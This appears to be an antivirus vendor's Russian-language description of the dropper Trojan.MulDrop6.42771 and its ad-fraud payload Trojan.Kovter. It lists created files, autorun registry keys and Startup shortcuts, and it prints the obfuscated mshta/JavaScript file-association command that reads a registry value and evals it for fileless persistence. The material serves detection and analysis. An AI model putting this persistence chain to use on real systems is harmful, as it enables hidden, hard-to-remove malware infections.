SHA1:
- aef75ada634aa2b2447a3a6502645b74b1e9e018
Детект для троянца-дроппера Trojan.MulDrop6.42771, использующего в качестве полезной нагрузки Trojan.Kovter.118. Trojan.Kovter можно отнести к категории рекламных троянцев — он незаметно для пользователя запускает в фоновом режиме несколько экземпляров браузера Microsoft Internet Explorer, «посещает» с их помощью указанные злоумышленниками сайты и накручивает количество просмотров рекламы, нажимая на ссылки и баннеры.
При запуске создает следующие файлы со случайными именами:
- C:\Users\<username>\AppData\Local\ea3e65
- C:\Users\<username>\AppData\Local\ea3e65\683149.2c1a69e
- C:\Users\<username>\AppData\Local\ea3e65\283804.bat
- C:\Users\<username>\AppData\Local\ea3e65\02962c.lnk
При этом файл 02962c.lnk ссылается на batch-файл C:\Users\<username>\AppData\Local\ea3e65\283804.bat, который содержит в себе следующую строку:
start "" "C:\Users\<username>\AppData\Local\ea3e65\683149.2c1a69e"Данные о файле с расширением .lnk заносятся в системный реестр Windows:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"\0vhnwb" = "C:\Users\<username>\AppData\Local\ea3e65\02962c.lnk"Имя значения содержит нечитаемые символы, поэтому стандартная программа regedit не может их показать.
Затем создает еще два файла:
- C:\Users\<username>\AppData\Roaming\01cd05\150b33.2c1a69e
- C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c652e1.lnk
Файл с расширением .lnk ссылается на C:\Users\<username>\AppData\Roaming\01cd05\150b33.2c1a69e
Файлы 683149.2c1a69e и 150b33.2c1a69e заполнены случайными данными, но имеют одинаковое расширение. Они используются как триггеры для запуска Trojan.Kovter.
Наконец, троянец создает в системном реестре файловые ассоциации:
[HKCR\.2c1a69e]
@=”bf1570\0”[HKCR\bf1570\shell\open\command]
@= 'mshta”javascript:qZ7sOhCI8q="EHHH";n7x=new ActiveXObject("WScript.Shell");DsJb4wGJs4="BtEe";j1ZSp8=n7x.RegRead("HKCU\\software\\isidaqnf\\amqoasyj");k7pfpsNfb="1beAz2j";eval(j1ZSp8);EHJ71gfGFX="2OxujZ1jpC";’